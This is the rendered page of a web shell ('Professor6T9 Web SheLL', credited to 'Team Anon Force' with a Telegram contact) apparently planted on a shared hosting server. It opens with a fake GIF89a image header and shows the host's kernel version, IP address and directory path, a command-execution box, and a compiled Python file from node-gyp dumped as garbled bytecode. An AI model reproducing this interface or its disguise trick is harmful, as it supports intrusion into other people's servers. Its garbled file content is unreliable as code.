GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium237.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
LiteSpeed
66.29.146.201
/
opt
/
alt
/
alt-nodejs6
/
root
/
usr
/
lib
/
node_modules
/
npm
/
node_modules
/
node-gyp
/
gyp
/
tools
[ HOME ]
Exec
Submit
File Name : pretty_vcproj.pyo
� �Rac @ s d Z d Z d d l Z d d l Z d d l m Z d d l m Z e � Z d a d e f d � � YZ d e f d � � YZ d d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z e d k r e j e e j � � n d S( s� Make the format of a vcproj really pretty. This script normalize and sort an xml. It also fetches all the properties inside linked vsprops and include them explicitly in the vcproj. It outputs the resulting xml to stdout. s nsylvain (Nicolas Sylvain)i����N( t parse( t Nodet CmpTuplec B s e Z d Z d � Z RS( s! Compare function between 2 tuple.c C s t | d | d � S( Ni ( t cmp( t selft xt y( ( sk /opt/alt/alt-nodejs6/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/tools/pretty_vcproj.pyt __call__ s ( t __name__t __module__t __doc__R ( ( ( sk /opt/alt/alt-nodejs6/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/tools/pretty_vcproj.pyR s t CmpNodec B s e Z d Z d � Z RS( s% Compare function between 2 xml nodes.c C s"